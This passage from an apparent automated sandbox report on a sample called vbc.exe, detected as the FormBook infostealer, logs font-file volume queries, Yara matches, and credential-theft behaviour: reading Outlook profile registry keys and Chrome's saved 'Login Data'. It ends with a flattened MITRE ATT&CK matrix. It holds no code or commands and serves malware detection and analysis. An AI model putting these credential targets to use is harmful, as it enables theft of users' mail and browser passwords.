        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Shared Modules        		Path Interception612
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		121
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop Protocol11
        Archive Collected Data        		Exfiltration Over Bluetooth3
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares1
        Data from Local System        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
        Process Injection        		NTDS1
